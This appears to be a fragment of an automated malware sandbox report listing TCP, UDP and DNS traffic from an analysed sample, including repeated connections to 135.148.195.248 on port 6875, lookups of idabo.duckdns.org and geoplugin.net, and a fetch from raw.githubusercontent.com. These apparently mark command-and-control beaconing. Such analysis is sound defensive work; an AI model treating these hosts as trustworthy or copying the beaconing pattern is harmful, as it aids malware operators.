                                                              Oct 14, 2024 11:36:17.406157017 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.406177998 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406193972 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406208992 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406239033 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.406263113 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.406275988 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406291008 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406303883 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406318903 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406332970 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406336069 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.406363010 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.406378984 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406402111 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406416893 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.406446934 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.406472921 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.407145023 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407191992 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407206059 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407275915 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407289982 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407294035 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.407299042 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407314062 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407341957 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.407367945 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.407665968 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407680988 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407696009 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407725096 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.407752037 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.407756090 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407779932 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407793999 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407808065 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407823086 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.407831907 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.407850027 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.408296108 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.408364058 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.408376932 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.408390999 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.408412933 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.408440113 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.449382067 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449407101 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449431896 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.449457884 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449498892 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449517965 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449539900 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.449547052 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449565887 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.449570894 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449590921 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.449624062 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.477785110 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477797985 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477819920 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477833033 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477833033 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.477874041 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477889061 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477900982 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.477906942 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477917910 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.477922916 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.477946997 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.478018999 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478041887 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478056908 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478070974 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478077888 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.478086948 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478106022 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.478120089 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.478529930 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478598118 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478657961 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478671074 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478686094 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478694916 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.478701115 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478720903 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.478732109 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.478882074 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478935957 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478950024 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.478971958 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.479015112 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479029894 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479063034 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.479104996 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479119062 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479132891 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479146004 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479151964 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.479161978 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479165077 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.479197025 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.479690075 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479703903 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479718924 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479753971 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.479763985 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479779959 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479794025 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479800940 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.479810953 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.479831934 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486020088 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486033916 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486047983 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486063004 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486071110 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486079931 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486094952 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486114025 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486129045 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486143112 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486154079 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486181021 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486331940 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486375093 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486382008 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486397982 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486433029 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486459017 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486474037 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486489058 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486501932 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486510992 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486541986 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486835003 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486876011 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486890078 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486906052 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486918926 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.486944914 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.486958981 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487183094 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487198114 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487212896 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487226963 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487236977 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487242937 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487257004 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487278938 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487279892 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487294912 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487308979 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487346888 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487787008 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487828016 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487829924 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487842083 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487879992 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487889051 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487904072 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487919092 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487931967 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487938881 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.487948895 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.487978935 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.494838953 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.494863033 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.494936943 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.494957924 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.494971991 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.494986057 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.494999886 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495013952 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495028019 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495043039 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.495064974 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495079041 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495093107 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495104074 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.495105982 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495130062 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495142937 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495157003 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495171070 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495184898 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495208979 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.495305061 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.495862007 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495912075 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495975971 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495976925 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.495990992 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496015072 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496027946 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496042013 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496054888 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496062040 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496160984 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496340990 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496355057 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496368885 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496412992 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496434927 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496448994 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496463060 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496474981 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496484041 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496499062 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496510029 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496515036 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496531010 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496552944 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496654987 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.538552046 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538569927 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538585901 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538609982 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538625956 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538640976 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538655996 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538672924 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.538721085 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.566864967 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.566926003 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.566941023 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.566950083 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.566992044 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567004919 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567018986 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567025900 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567125082 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567125082 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567183971 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567198038 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567212105 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567224979 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567231894 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567236900 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567253113 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567266941 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567281008 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567284107 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567296982 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567311049 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567315102 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567325115 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567339897 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567339897 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567353964 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567364931 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567368984 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567428112 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567429066 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.568013906 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568028927 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568051100 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568063974 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568084955 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568092108 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.568099976 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568114996 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568125963 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.568144083 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.574858904 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.574927092 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.899461985 CEST8049723178.237.33.50192.168.2.5
                                                              Oct 14, 2024 11:36:17.899538040 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:36:18.836263895 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:18.841316938 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841334105 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841356039 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841367006 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841387987 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841399908 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841412067 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:18.841412067 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:18.841419935 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841433048 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841470003 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841480970 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846314907 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846328020 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846426010 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846446991 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846483946 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846494913 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846832991 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846889019 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:36.755186081 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:36.756551027 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:36.761343956 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:06.770121098 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:06.771374941 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:37:06.776410103 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:36.772552013 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:36.773931980 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:37:36.778897047 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:06.277985096 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:06.598278046 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:06.788789988 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:06.790429115 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:38:06.795253038 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:07.279362917 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:08.480937958 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:10.980966091 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:15.887182951 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:25.513298035 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:36.792798996 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:36.801995039 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:38:36.806873083 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:06.794198036 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:06.795279026 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:39:06.800163031 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:36.810085058 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:36.814573050 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:39:36.819413900 CEST687549714135.148.195.248192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 14, 2024 11:36:07.399461985 CEST6200453192.168.2.51.1.1.1
                                                              Oct 14, 2024 11:36:07.406614065 CEST53620041.1.1.1192.168.2.5
                                                              Oct 14, 2024 11:36:14.594326019 CEST5003453192.168.2.51.1.1.1
                                                              Oct 14, 2024 11:36:15.334422112 CEST53500341.1.1.1192.168.2.5
                                                              Oct 14, 2024 11:36:16.271738052 CEST5027253192.168.2.51.1.1.1
                                                              Oct 14, 2024 11:36:16.279804945 CEST53502721.1.1.1192.168.2.5
                                                              Oct 14, 2024 11:36:29.062748909 CEST5337753192.168.2.51.1.1.1
                                                              Oct 14, 2024 11:36:29.073044062 CEST53533771.1.1.1192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 14, 2024 11:36:07.399461985 CEST192.168.2.51.1.1.10x53dcStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:14.594326019 CEST192.168.2.51.1.1.10xd9c8Standard query (0)idabo.duckdns.orgA (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:16.271738052 CEST192.168.2.51.1.1.10xbedaStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
